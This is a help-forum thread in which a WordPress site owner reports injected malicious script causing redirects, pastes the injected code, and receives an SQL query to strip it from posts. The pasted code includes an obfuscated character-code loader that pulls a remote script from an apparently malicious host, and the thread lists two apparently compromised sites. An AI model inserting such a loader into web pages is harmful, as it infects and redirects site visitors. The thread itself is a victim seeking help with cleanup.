My WordPress websites are infected with malicious code. What can I do to regain data or backup? Websites are showing blank page or redirect to some malicious URL. The below code (and similar) were injected in many pages (also many files with different names were created) :
<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
Some of my infected websites (warning: visiting may infect) :
https://lahuriyaconstruction.com/
https://getnonveg.com/
Same here - open your database in phpmyadmin and enter the following in SQL box:
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
It will clean all posts from the script, but you have to look where the entries come from.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With